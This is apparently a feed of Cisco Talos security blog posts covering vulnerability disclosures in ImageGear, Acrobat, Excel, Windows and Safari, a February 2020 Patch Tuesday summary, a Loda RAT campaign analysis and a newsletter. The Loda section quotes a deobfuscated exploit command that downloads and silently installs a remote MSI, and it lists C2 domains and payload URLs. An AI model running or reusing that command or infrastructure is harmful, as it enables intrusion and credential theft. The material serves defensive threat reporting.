Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Reverse http payload detected - (6)
An exploit payload intended to connect back to an attacker controlled host using http has been detected.

Vulnerability Spotlight: Accusoft ImageGear library code execution vulnerabilities

$
0
0

Emmanuel Tacheau of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Cisco Talos recently discovered three code execution vulnerabilities in Accusoft ImageGear. The ImageGear library is a document-imaging developer toolkit to assist users with image conversion, creation, editing and more. There are vulnerabilities in certain functions of ImageGear that could allow an attacker to execute code on the victim machine.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Accusoft to ensure that these issues are resolved and that an update (link will generate a download) is available for affected customers.

Vulnerability details

Accusoft ImageGear TIFF TIF_read_stripdata code execution vulnerability (TALOS-2019-0972/CVE-2019-5187)

An exploitable out-of-bounds write vulnerability exists in the TIF_read_stripdata function of the igcore19d.dll library of Accusoft ImageGear 19.5.0. A specially crafted TIFF file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear PCX uncompress_scan_line buffer size computation code execution vulnerability (TALOS-2020-0986/CVE-2020-6063)

An exploitable out-of-bounds write vulnerability exists in the `uncompress_scan_line` function of the igcore19d.dll library of Accusoft ImageGear, version 19.5.0. A specially crafted PCX file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear PCX uncompress_scan_line buffer copy operation code execution vulnerability (TALOS-2020-0987/CVE-2020-6064)

An exploitable out-of-bounds write vulnerability exists in the `uncompress_scan_line` function of the igcore19d.dll library of Accusoft ImageGear, version 19.5.0. A specially crafted PCX file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear BMP bmp_parsing buffer size computation code execution vulnerability (TALOS-2020-0989/CVE-2020-6065)

An exploitable out-of-bounds write vulnerability exists in the bmp_parsing function of the igcore19d.dll library of Accusoft ImageGear, version 19.5.0. A specially crafted BMP file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear JPEG SOFx code execution vulnerability (TALOS-2020-0990/CVE-2020-6066)

An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll JPEG SOFx parser of the Accusoft ImageGear 19.5.0 library. A specially crafted JPEG file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear TIFF tifread code execution vulnerability (TALOS-2020-0991/CVE-2020-6067)

An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll TIFF tifread parser of the Accusoft ImageGear 19.5.0 library. A specially crafted TIFF file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear JPEG jpegread precision code execution vulnerability (TALOS-2020-0993/CVE-2020-6069)

An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll JPEG jpegread precision parser of the Accusoft ImageGear 19.5.0 library. A specially crafted JPEG file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that version 19.5.0 of Accusoft ImageGear is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52490 - 52493, 53015, 53016, 53032 - 53035

Introducing Cisco Talos Incident Response: Stories from the Field

$
0
0


By Jon Munshaw.

As another way of bringing our boots-on-the-ground intelligence to defenders, customers and users, we are introducing a new video series called "Cisco Talos Incident Response: Stories from the Field."

In each entry, a CTIR team member will cover one specific incident or lesson that they feel can be applicable to the everyday defender. First up is Pierre Cadieux, who recalls a recent incident at a health care company. He walks through the containment of the attack and recounts some lessons from that event he shares with other customers.

You can watch the full video above. To learn more about Talos Incident Response, click here.

Vulnerability Spotlight: Information leak vulnerability in Adobe Acrobat Reader’s JavaScript function

$
0
0

Aleksandar Nikolic of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered an information leak vulnerability in Adobe Acrobat Reader. Acrobat supports a number of features, including the ability to process embedded JavaScript. An attacker could trigger this vulnerability by tricking a user into opening a malicious file or web page with embedded JavaScript in a PDF. The attacker could then gain access to sensitive information, which could then be used in additional attacks.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC JavaScript field name information leak (TALOS-2019-0959/CVE-2020-3744)

A specific JavaScript code embedded in a PDF file can lead to an information leak when opening a PDF document in Adobe Acrobat Reader DC, version 2019.021.20048. This could allow an attacker to view sensitive information, which could be abused when exploiting another vulnerability to bypass mitigations. The victim would need to open the malicious file or access a malicious web page to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that version 2019.021.20048 of Adobe Acrobat Reader DC is affected by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52331, 52332

Microsoft Patch Tuesday — Feb. 2020: Vulnerability disclosures and Snort coverage

$
0
0











By Jon Munshaw.

Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 98 vulnerabilities, 12 of which are considered critical and 84 that are considered important. There are also two bugs that were not assigned a severity.

This month's patches include updates to the Windows kernel, the Windows scripting engine and Remote Desktop Procol, among other software and features. Microsoft also provided a critical advisory covering updates to Adobe Flash Player.

Talos released a new set of SNORTⓇ rules today that provide coverage for some of these vulnerabilities, which you can see here.

Critical vulnerabilities

Microsoft disclosed 12 critical vulnerabilities this month, all of which we will highlight below.

CVE-2020-0673, CVE-2020-0674, CVE-2020-0710, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713 and CVE-2020-0767 are all memory corruption vulnerabilities in the Microsoft scripting engine that deals with how Internet Explorer handles objects in memory. An attacker could use these vulnerabilities to corrupt memory on the victim machine in a way that would allow them to execute arbitrary code. A user could trigger this bug by visiting an attacker-controlled web page on Internet Explorer that's been specially crafted to exploit this vulnerability. Alternatively, an attacker could embed an ActiveX control marked "safe for initialization" in another application or Microsoft Office document that utilizes the Internet Explorer rendering engine and convince the victim to open that file.

CVE-2020-0681 and CVE-2020-0734 are remote code execution vulnerabilities in Remote Desktop Protocol when the user connects to a malicious server. An attacker can exploit these vulnerabilities by hosting a server, and convincing a user to connect to it, likely via social engineering or a man-in-the-middle technique.

CVE-2020-0662 is a remote code execution vulnerability in Windows 10 and some versions of Windows Server that exists in the way the software handles objects in memory. If successfully exploited, this vulnerability could allow an attacker to execute arbitrary code with elevated permissions on the victim machine. The attacker would need a domain user account, and then create a specially crafted request.

CVE-2020-0729 is a remote code execution vulnerability in Windows that could allow an attacker to remotely execute code if Windows processes a specially crafted .LNK file. An adversary could exploit this vulnerability by sending the user a removable drive or remote share containing a malicious .LNK file and an associated malicious binary. If the user opens the file in Windows Explorer or another application that parses .LNK files, the binary will execute code of the attacker's choice.

CVE-2020-0738 is a memory corruption vulnerability in Windows Media Foundation that exists in the way the software handles objects in memory. An attacker could exploit this bug by convincing the user to open a specially crafted, malicious file or web page, which would corrupt memory in a way the attacker could then install programs, manipulate user data or create new user accounts on the victim machine.

                Important vulnerabilities

                This release also contains 84 important vulnerabilities:

                Other vulnerabilities

                There are two other vulnerabilities, CVE-2020-0693 and CVE-2020-0702, for which Microsoft did not assign a severity.

                Coverage 

                In response to these vulnerability disclosures, Talos is releasing a new SNORTⓇ rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

                These rules are:  48701, 48702, 53050 - 53056, 53061, 53072, 53073, 53079 - 53089

                Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel

                $
                0
                0

                Marcin Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

                Microsoft Excel contains a code execution vulnerability. This specific bug lies in the component of Excel that handles the Microsoft Office HTML and XML file types, first introduced in Office 2000. Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates Microsoft released, read Talos’ full blog here.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.


                Vulnerability details

                Microsoft Office Excel Ordinal43 code execution vulnerability (TALOS-2019-0968/CVE-2020-0759)

                An exploitable use-after-free vulnerability exists in Excel in Microsoft Office Professional Plus 2016 x86, version 1909, build 12026.20334 and Microsoft Office 365 ProPlus x86, version 1902, build 11328.20480. A specially crafted XLS file can cause a use after free condition, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that this vulnerability affects Microsoft Office Professional Plus 2016 x86, version 1909, build 12026.20334 and Microsoft Office 365 ProPlus x86, version 1902, build 11328.20480.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 52417, 52418

                Vulnerability Spotlight: Code execution vulnerability in Microsoft Media Foundation

                $
                0
                0

                Marcin Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

                Microsoft Media Foundation’s framework contains a code execution vulnerability. This specific bug lies in Media Foundations’ MPEG4 DLL. An attacker could provide a user with a specially crafted ASF file to exploit this vulnerability. Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates Microsoft released, read Talos’ full blog here.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.


                Vulnerability details

                Microsoft Media Foundation IMFASFSplitter::Initialize code execution vulnerability (TALOS-2019-0946/CVE-2020-0738)

                An exploitable type confusion vulnerability exists in the mfasfsrcsnk.dll of Microsoft Media Foundation 10.0.18362.207. A specially crafted ASF file can cause type confusion, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that this vulnerability affects the 32-and 64-bit versions of Windows 10 Media Foundation ASF Source and Sink DLL, version 10.0.18362.207 (WinBuild.160101.0800).

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 52095, 52096

                Vulnerability Spotlight: Use-after-free vulnerability in Windows 10 win32kbase

                $
                0
                0

                Marcin Towalski of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

                Cisco Talos is releasing the details of a use-after-free vulnerability in Windows 10. An attacker could exploit this vulnerability to gain the ability to execute arbitrary code in the kernel context. Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates Microsoft released, read Talos’ full blog here.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                Windows 10 win32kbase HMMarkObjectDestroy arbitrary code execution vulnerability (TALOS-2019-0970/CVE-2020-0731)

                A use after free vulnerability exists in Windows 10, Version 10.0.19033.1, when a Win32k component fails to properly handle objects in memory. Successful exploitation of this vulnerability can lead to arbitrary code execution in the kernel context and elevation of privileges. This vulnerability occurs only on an x86 machine.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that this vulnerability affects Microsoft Windows 10, version 10.0.19033.1, Insider Preview Fast running on an x86 machine.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 52432, 52433

                Vulnerability Spotlight: Remote code execution vulnerability in Apple Safari

                $
                0
                0

                Marcin Towalski of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

                The Apple Safari web browser contains a remote code execution vulnerability in its Fonts feature. If a user were to open a malicious web page in Safari, they could trigger a type confusion, resulting in
                memory corruption and possibly arbitrary code execution. An attacker would need to trick the user into visiting the web page by some means to trigger this vulnerability.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Apple to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                Apple Safari FontFaceSet remote code execution vulnerability (TALOS-2019-0967/CVE-2020-3868)

                A type confusion vulnerability exists in the Fonts feature of Apple Safari, version 13.0.3. A specially crafted HTML web page can cause a type confusion, resulting in memory corruption and possibly arbitrary code execution. To trigger this vulnerability, the target application needs to process a specially crafted HTML web page.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that this vulnerability affects Safari, version 13.0.3 (15608.3.10.1.4); Safari technology preview release 96 (Safari 13.1, WebKit 15609.1.9.7) and Webkit GIT e4cd3b4fab6166d1288984ded40c588439dab925.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 52415, 52416

                Loda RAT Grows Up

                $
                0
                0
                By Chris Neal.

                • Over the past several months, Cisco Talos has observed a malware campaign that utilizes websites hosting a new version of Loda, a remote access trojan (RAT) written in AutoIT.
                • These websites also host malicious documents that begin a multi-stage infection chain which ultimately serves a malicious MSI file. The second stage document exploits CVE-2017-11882 to download and run the MSI file, which contains Loda version 1.1.1.
                • This campaign appears to be targeting countries in South America and Central America, as well as the U.S.

                What's New?


                Talos has observed several changes in this version of Loda. The obfuscation technique used within the AutoIT script changed to a different form of string encoding. Multiple persistence mechanisms have been employed to ensure Loda continues running on the infected host following reboots. Lastly, the new version leverages WMI to enumerate antivirus solutions running on the infected host.





                How Did it Work?


                The Loda sample analyzed in this post is delivered via a document chain. The first contains an OOXML relationship to a second document that contains an exploit. Once the exploit is triggered, an MSI file that contains the Loda RAT is downloaded to the target host and executed. While the main purpose of this RAT is to steal usernames, passwords, and cookies saved within browsers, it also has keylogging, sound recording, screenshotting and the ability to allow the threat actor to send messages to the infected host.

                So What?

                Loda is a simple, yet effective, RAT that has matured over time. This RAT is a good example of how effective relatively simple techniques combined with basic obfuscation can be. The techniques this malware employs are of fairly low complexity and show that slight changes in implementation can significantly reduce detection rates.

                The Campaign


                Telemetry from Cisco Umbrella shows that this campaign is quite active and seems to be targeting countries in South America, Central America and the U.S. The majority of the queries to the C2 domain "4success[.]zapto[.]org" originate from Brazil, Costa Rica and the United States. Similarly, the queries to "success20[.]hopto[.]org" originate from Argentina, Brazil and the United States. Our telemetry also shows that C2 communications go as far back as the last quarter of 2019.


                DNS queries to 4success[.]zapto[.]org

                DNS queries to success20[.]hopto[.]org


                Infection chain

                At the time of analysis, several steps of the infection chain had a relatively low detection rate due to various obfuscation techniques. The initial document is delivered via a phishing email that contains the first-stage document as an attachment.

                Example of an email from this campaign

                The first document in the infection chain, titled in one instance "comprobante de confirmación de pago.docx" contains an OOXML relationship, located in "/word/_rels" that points to a second document at "http://lcodigo[.]com/apiW/config/uploads/tmp/documento.doc". Aside from this OOXML relationship, the initial document isn't particularly noteworthy. The document uses this two-stage document technique to bypass some email filters.

                OOXML Relationship

                The second document is a Rich Text Format document that contains a payload within an obfuscated OLE object which is then executed by exploiting CVE-2017-11882, an arbitrary code execution vulnerability in some versions of Microsoft Office. The contents of the Author field, "obidah qudah" in the metadata of this document appears to be constant across all samples analyzed during the investigation.

                When we looked deeper into this author's name, we discovered they have a relatively long history of being associated with malicious RTF documents. Starting in 2017, there have been just under 1,300 malicious documents submitted to VirusTotal that contain "obidah qudah" in the author field. An overwhelming majority of these submissions are RTF documents that exploit CVE-2017-11882.

                However, the "Last Modified By" field is not static throughout these documents. There appear to be multiple campaigns over the last few years, starting in 2017, that use the "obidah qudah" author name, with each campaign using a different "Last Modified By" field, with many serving malware other than Loda. It is unclear whether these campaigns were initiated by the same threat actor, or if a single malicious RTF document builder was used by multiple different actors. In the documents analyzed in this post, the "Last Modified By" value is set to "Richard."

                Author labeled as "obidah qudah"

                The OLE object within this document that contains the exploit and payload employs an interesting obfuscation technique that utilizes RTF control words.

                Obfuscated payload

                The control word "\par" used in the object indicates the end of a paragraph, while the "\*" has a slightly more complex function. The "\*" control word instructs an RTF reader to ignore the following control words only if they are not understood by the reader, which allows the author to include false control words (ex: \par67234). Using this technique to break up the OLE object not only obfuscates the payload but also does not allow RTF parsers to read the object in its entirety. Once it is executed, the control words will be ignored, concatenating the bytes in between into the exploit payload as shown below.

                Deobfuscated payload

                Within this payload, the command "cmd.exe & /C CD C: & msiexec.exe /i http://lcodigo[.]com/apiW/config/uploads/tmp/fkrkdn.msi /quiet" can be seen. Once the exploit is triggered, a malicious MSI file is then downloaded and executed.

                This MSI was created using Exe2Msi, a common tool used to repackage Windows executables as an MSI file. Although this tool is most often used with legitimate software, it is also frequently used by malware authors. One of the benefits of delivering malware in an MSI package is that it provides a lower detection rate. Simply repackaging a malicious executable as an MSI file can reduce detection rates with very little effort. If repackaged as an MSI, the detection rate of a malicious executable can drop by up to 50 percent on VirusTotal. Combined with other forms of obfuscation, this can result in a crude, yet effective, means of evasion.

                The malware


                At execution, "fkrkdn.msi" extracts an executable at "C:\Users\<user>\AppData\Roaming\Windata\JLMWFF.exe." This is the Loda 1.1.1 binary, which is a compiled AutoIT script. A detailed write-up by Proofpoint on a previous version of Loda and its functionality can be found here.

                The initial C2 beacon was captured from "JLMWFF.exe" which contained the unique signature "ZeXro0" repeated several times, which is not present in other versions of Loda. The C2 comms pointed to "4success[.]zapto[.]org" contain information about the infected host, including OS version, architecture and username. This also reveals that this version of Loda is "1.1.1." Aside from the unique signature, this beacon format is the same as previous versions.

                Even though this new version of Loda has nearly identical functionality as previous versions, there are significant differences in implementation and design. Some of the functions within the script have been completely rewritten, with the most readily apparent change being the obfuscation technique used. In version 1.1.1, almost every string or variable is obfuscated using the simple encoding algorithm shown below.

                Loda's encoding algorithm

                There are a few key changes in functionality in version 1.1.1. To detect what antivirus software is running on the host, earlier versions of Loda would call the AutoIT function PROCESSEXISTS() for each antivirus software process name. Loda 1.1.1 now makes a WMI query to "winmgmts:\\localhost\root\SecurityCenter2" to enumerate installed antivirus solutions, as shown below in the deobfuscated code:

                AV enumeration function

                For persistence, the new version now adds both a registry key and a scheduled task:

                Persistence mechanism

                A new capability this version has is the ability to read the contents of "\filezilla\recentservers.xml". This document contains the IP addresses, usernames and passwords of servers that Filezilla has recently connected to. It is important to note that these passwords are stored in either plaintext or encoded in base64.

                One interesting functionality that persists through the versions of Loda is the command "QURAN". This command streams music from "live.mp3quran[.]net:9976" in Windows Media Player using the Microsoft Media Server (MMS) protocol. MMS is a deprecated Microsoft proprietary network streaming protocol used to stream media in Windows Media Player.

                "QURAN" command function
                There is no other functionality to this command other than playing the music that is streaming at this URL to the infected host.

                Conclusion


                Although the functionality of this new version of Loda is similar to previous versions, this new iteration is a slightly more well-developed RAT. Loda is simple yet has proven to be effective, and poses a serious threat to an infected host. The credential stealing capabilities could lead to significant financial loss or a potential data breach. By changing the obfuscation techniques the threat actor was able to lower the detection rate considerably. The change in persistence mechanisms and AV solution detection show that the malware authors are actively improving the functionality of Loda.

                Coverage

                Snort

                [SID] 53031

                ClamAV

                Win.Packed.LokiBot-6963314-0
                Doc.Exploit.Cve_2017_11882-7570663-1
                Doc.Downloader.Loda-7570590-0

                Additional ways our customers can detect and block this threat are listed below.

                Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

                Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.

                Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), andMeraki MX can detect malicious activity associated with this threat.

                AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                IOCs:


                http://lcodigo[.]com/apiW/config/uploads/tmp/documento.doc
                http://lcodigo[.]com/apiW/config/uploads/tmp/fkrkdn.msi
                http://lcodigo[.]com/apiW/config/uploads/tmp/kctlqz.msi
                http://drinkfoodapp[.]com/AdminDF/assets/img/app/settings.doc
                http://drinkfoodapp.com/AdminDF/assets/img/app/grcfne.msi
                http://yewonder[.]com/wp-content/plugins/ltfhmam/eklnxx.msi
                https://www[.]miracleworkstudios[.]com/wp-content/uploads/2019/12/app/updates.doc
                http://wp[.]168gamer[.]com/secured/mcsonb.msi
                http://wp[.]168gamer[.]com/secured/office.doc

                Docs:


                b5df816986a73e890f41ff0c0470a2208df523f17eb4eac9c5f0546da2ec161e
                af42191fe2ea328080939ec656302a8f364dac44b5cd8277dcbaeb15ff499178
                36865059f1c142ba1846591aae8d78d8a109a0dc327a88547e41e3663bad2eaf e15336491ab57a16a870edd5b135014b62387cb45e4e490b9d4091c54394dec4

                MSI:


                9edd2bfdb0c177f046cec1392d31ee3f67174e0a23fdf7e4b6fd580e769f0493
                8b989db4a9f8c3f0fa825cca35386ac4be4e33fd2ea53a118d4f4dd8259aeccc
                633f3970c31c9cb849bd5f66c3a783538bb2327b4bec5774b870f8b3b53ea3c1
                C65668958c5dfeccb40abd0771c17d045f24c78f51ea6c3955e110f53ad8eece
                740a5c19645d5a90fc1e11c84f5d6a058dc50206337aa37bbc783bd54ba84a79
                6cb47f2ecd58349ffe65d7ea281eea2ebd231bbaac30843f872ae2249bd140b0

                C2:


                4success[.]zapto[.]org
                success20[.]hopto[.]org
                breakthrough[.]hopto[.]org

                Threat Source newsletter (Feb. 13, 2020)

                $
                0
                0

                Newsletter compiled by Jon Munshaw.

                Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                This month’s Microsoft Patch Tuesday was particularly hefty, with the company disclosing nearly 100 vulnerabilities — three of which Talos researchers discovered. For our complete wrapup, check out the blog post here, and be sure to update your Microsoft products now if you haven’t already.

                Over on our YouTube page, we have a new video series we’re debuting called “Stories from the Field” with the Cisco Talos Incident Response Team. In each video, one of our team members will discuss one incident they remember working on and what lessons they took away from it, and what other defenders can learn.

                On the research side of things, we have new findings out about a variant of the Loda RAT. We recently discovered that this malware family added several anti-detection features and is targeting victims across the Americas. 

                And, as always, we have the latest Threat Roundup where we go through the top threats we saw — and blocked — over the past week.

                Upcoming public engagements

                Event: Cisco Live Australia 
                Location: Melbourne Convention & Exhibition Centre, Melbourne, Australia
                Date: March 3 - 6
                Speakers: Nick Biasini
                Synopsis: Cisco Talos specializes in early-warning intelligence and threat analysis necessary for maintaining a secure network. People responsible for defending networks realize that the security threat landscape is constantly in flux as attackers evolve their skills. Talos advances the overall efficacy of all Cisco security platforms by aggregating data, cooperating with teams of security experts, and applying the cutting-edge big data technology to security. In Nick's talk at Cisco Live, he will perform a deep analysis of recent threats and show how Talos leverages large datasets to deliver product improvements and mitigation strategies.

                Event: “Everyone's Advanced Now: The evolution of actors on the threat landscape” at Interop Tokyo 2020
                Location: Makuhari Messe, Tokyo, Japan
                Date: April 13 - 15
                Speakers: Nick Biasini
                Synopsis: In the past, there were two clear classes of adversary an enterprise would face: sophisticated and basic. These basic threats were commodity infections that would require simple triage and remediation. Today, these commodity infections can quickly turn into enterprise-crippling ransomware attacks, costing organizations millions of dollars to recover. Now more than ever, organizations need every advantage they can get — and threat intelligence is a big part of it. Having visibility into your own environment and attacks around the globe are equally vital to success. This talk will cover these trends and show how the gap between the sophisticated and the basic adversary is quickly disappearing.

                Cyber Security Week in Review

                • The U.S. charged four members of the Chinese military for their involvement in the massive Equifax data breach. Federal prosecutors allege the men hacked into Equifax’s systems and stole the personal information of nearly half of all Americans. 
                • Political pundits, security researchers and government officials are still unpacking the Iowa caucus debacle. While a results-reporting app has been largely to blame, there are several factors that went into a heavy delay of the democratic presidential primary results. 
                • One factor that may have been involved is a distributed denial-of-service attack on a phone line used to report election results in Iowa. Members of an online forum started an effort to flood the phone line the day of the election, with Iowa Democratic party officials saying they received "an unusually high volume of inbound phone calls to its caucus hotline." 
                • But the app used in Iowa isn’t the only new technology making an appearance in this year’s election. The discourse in Iowa is leading other states’ officials to take a closer look at their election systems and whether they have paper backups in place. 
                • A cyber group in the Gaza strip may be behind a new string of attacks on Palestinians. Attackers use politically themed documents and emails to lure victims into clicking on malicious links, eventually installing backdoors on their machines. 
                • The xHelper trojan on Android devices can even survive a factory reset of the infected device. Instead, users need to scan for specific files on their device and remove them prior to any resets so that the malware does not come pre-installed. 
                • Google says new initiatives for its Play store helped block more than 1.9 billion malware infections in 2019. The company says that new scanning policies and stepped-up privacy rules have cut back on malicious apps. 
                • A powerful Republican Senator blocked three new election security bills from being introduced to the full chamber. One of the bills would have outlawed voting machines from being connected to the internet, while another two would increase the level of cooperation between the FBI and local voting officials. 
                • Iran says it deflected one of the largest cyber attacks in the country’s history. Researchers found that internet access was restricted to roughly 25 percent of all users in Iran during the attack last week for about an hour. 

                Notable recent security issues

                Title: 12 critical vulnerabilities fixed in latest Microsoft Patch Tuesday  
                Description: Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 98 vulnerabilities, 12 of which are considered critical and 84 that are considered important. There are also two bugs that were not assigned a severity. This month's patches include updates to the Windows kernel, the Windows scripting engine and Remote Desktop Procol, among other software and features. Microsoft also provided a critical advisory covering updates to Adobe Flash Player. 
                Snort SIDs: 48701, 48702, 53050 - 53056, 53061, 53072, 53073, 53079 - 53089 

                Title: Adobe releases updates for Reader, Flash Player and more  
                Description: Adobe disclosed 42 new vulnerabilities this week as part of its monthly security update, 35 of which are considered critical. These updates include Acrobat Reader, Flash Player and other Adobe products. Most notable are two bugs in Flash Player and Adobe Framemaker that could allow an attacker to execute arbitrary code on the victim machine. 
                Snort SIDs: 52331, 52332

                Most prevalent malware files this week

                SHA 256: 1460fd00cb6addf9806a341fee9c5ab0a793762d1d97dca05fa17467c8705af7 
                MD5: 88cbadec77cf90357f46a3629b6737e6
                Typical Filename: FlashHelperServices.exe
                Claimed Product: Flash Helper Services
                Detection Name: PUA.Win.File.2144flashplayer::tpd 

                SHA 256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
                MD5: 8c80dd97c37525927c1e549cb59bcbf3
                Typical Filename: eternalblue-2.2.0.exe
                Claimed Product: N/A
                Detection Name: W32.85B936960F.5A5226262.auto.Talos

                SHA 256:97d8ea6cee63296eaf0fa5d97a14898d7cec6fa49fee1bf77c015ca7117a2ba7 
                MD5: be52a2a3074a014b163096055df127a0
                Typical Filename: xme64-553.exe 
                Claimed Product: N/A
                Detection Name: Win.Trojan.Coinminer::tpd

                SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
                MD5: 799b30f47060ca05d80ece53866e01cc
                Typical Filename: mf2016341595.exe
                Claimed Product: N/A
                Detection Name: W32.Generic:Gen.22fz.1201

                SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
                MD5: e2ea315d9a83e7577053f52c974f6a5a
                Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
                Claimed Product: N/A
                Detection Name: W32.AgentWDCR:Gen.21gn.1201

                Keep up with all things Talos by following us on TwitterSnortClamAV and Immunet also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here (as well as on your favorite podcast app). And, if you’re not already, you can also subscribe to the weekly Threat Source newsletter here.  

                Threat actors attempt to capitalize on coronavirus outbreak

                $
                0
                0


                By Nick Biasini and Edmund Brumaghin.
                • Coronavirus is dominating the news and threat actors are taking advantage.
                • Cisco Talos has found multiple malware families being distributed with Coronavirus lures and themes. This includes emotet and several RAT variants.

                Executive Summary

                Using the news to try and increase clicks and drive traffic is nothing new for malicious actors. We commonly see actors leveraging current news stories or events to try and increase the likelihood of infection. The biggest news currently is focused on the new virus affecting the world, with a focus on China: the coronavirus. There are countless news articles and email-based marketing campaigns going at full throttle right now, as such, we wanted to take a deeper look at how this is manifesting itself on the threat landscape.

                Our investigation had several phases, first looking at the email based campaigns then pivoting into open-source intelligence sources for additional samples. These investigations uncovered a series of campaigns from the adversaries behind Emotet, along with a series of other commodity malware families using these same topics as lures, and a couple of odd documents and applications along the way. What was also striking was the amount of legitimate emails containing things like Microsoft Word documents and Excel spreadsheets related to the coronavirus. This really underscores why using these as lures is so attractive to adversaries and why organizations and individuals need to be vigilant when opening mail attachments, regardless of its origins.

                What's new? Malware authors and distributors will go through any means necessary to achieve success and generate revenue and this is just the latest example. These lures tied to coronavirus are likely to only increase in volume and variety as the virus continues to spread and dominate the headlines.

